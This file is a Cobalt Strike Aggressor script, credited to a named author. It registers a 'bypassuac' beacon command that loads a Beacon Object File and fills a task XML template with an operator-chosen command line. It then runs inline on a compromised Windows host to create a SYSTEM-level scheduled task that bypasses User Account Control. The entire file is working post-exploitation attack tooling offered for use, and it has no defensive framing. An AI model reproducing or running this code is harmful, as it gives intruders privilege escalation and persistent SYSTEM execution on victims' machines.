#bypassuac Bof
#credit: @BambiZombie

#register help
beacon_command_register("bypassuac", "Bypass UAC to Add a SYSTEM Task.",
	"Synopsis: bypassuac <Task name> <Commandline>\n" .
	"Bof implementation of the bypassuac.\n");

alias bypassuac {
    if ($2 eq "")
	{
		berror($1, "Please specify a task name.");
        return;
	}

    if ($3 eq "")
	{
		berror($1, "Please specify a command to run");
        return;
	}

    $bid = $1;
    $taskname = $2;
    $xmlfile = "task.xml";
    $cmdline = $3;

    # Read in the right BOF file
    $handle1 = openf(script_resource("bypassuac." . barch($bid) . ".o"));
    $data1   = readb($handle1, -1);
    closef($handle1);
	
	# Read from the XML file
    $handle2 = openf(script_resource($xmlfile));
    $data2   = readb($handle2, -1);
    closef($handle2);

    $xmlcontent = replace($data2, "CMD", $cmdline);

    # Pack our arguments
    $arg_data  = bof_pack($bid, "ZZ", $taskname, $xmlcontent);
    
    beacon_inline_execute($bid, $data1, "go", $arg_data);
}
